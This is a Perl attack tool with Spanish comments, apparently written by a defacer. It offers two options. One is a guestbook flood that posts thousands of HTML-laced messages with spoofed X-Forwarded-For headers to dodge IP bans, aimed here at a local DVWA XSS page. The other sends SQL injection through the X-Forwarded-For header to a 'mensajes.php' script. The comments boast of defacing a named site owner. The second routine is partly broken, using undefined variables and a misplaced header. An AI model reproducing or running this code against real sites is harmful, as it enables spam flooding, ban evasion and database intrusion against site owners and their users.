#!/usr/bin/perl
##  PhpTagCool Zatueritor 1.0
##  Copyright: Megabyte www.mbytesecurity.org
##  Greetz: Rootbox for discovering the forwarded-for issue
##  Te amo Pandora
##  Crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que inventaras?
  
use IO::Socket;
  
$x = 0;
  
print q(
PhpTagCool Zatueritor 1.0
by Megabyte
  
);

  
print q(Tipo de Atake |1 = Posteo Masivo, 2 = Injeccion SQL| );
$type = <STDIN>;
chop ($type);
  
## The Flood Attack
if($type == 1){
  
  
while($x != 99999)
{
  
  
$nick = "txtName=megabyte" . "$x";
  
## We generate our own ip address so we won't be banned  :)
$ip = "127.0.0" . "$x";
  
  
$postit = "$nick"."&mtxMessage=%3Ch1%3Eolakemira&btnSign=Sign+Guestbook";
  
  
$lrg = length $postit;
  
  
my $sock = new IO::Socket::INET (
                                 PeerAddr => "127.0.0.1",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nNo se pudo conectar  :(  $!\n" unless $sock;
  
## We Fake the X-Forwarded-For header,so we can post with multiple ip's
print $sock "POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1\n";
print $sock "Host: 127.0.0.1\n";
print $sock "Proxy-Connection: keep-alive\n";
print $sock "Content-Length: $lrg\n";
print $sock "Cache-Control: max-age=0\n";
print $sock "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n";
print $sock "Origin: http://127.0.0.1\n";
print $sock "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.56 Safari/537.17\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Referer: http://127.0.0.1/dvwa/vulnerabilities/xss_s/\n";
print $sock "Accept-Language: es-ES,es;q=0.8\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\n";
print $sock "Cookie: security=low; PHPSESSID=oh2j2abkqsmgipi4s19m0dk2t1\n\n";
print $sock "$postit\n";
close($sock);
  
  
syswrite STDOUT, ".";


  

$x++;


}
  
## The SQL injection attack  :)
}
elsif ($type == 2){
  
print q(Inyeccion );
$sql = <STDIN>;
chop ($sql);
  
  
  
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nNo se pudo conectar  :(  $!\n" unless $sock;
  
  
print $sock "POST $pth"."mensajes.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q
=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox
/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "X-Forwarded-For: $sql\n";
close($sock);
  
}else{
  
    die "Solo hay 2 opciones IMBECIL\n";
}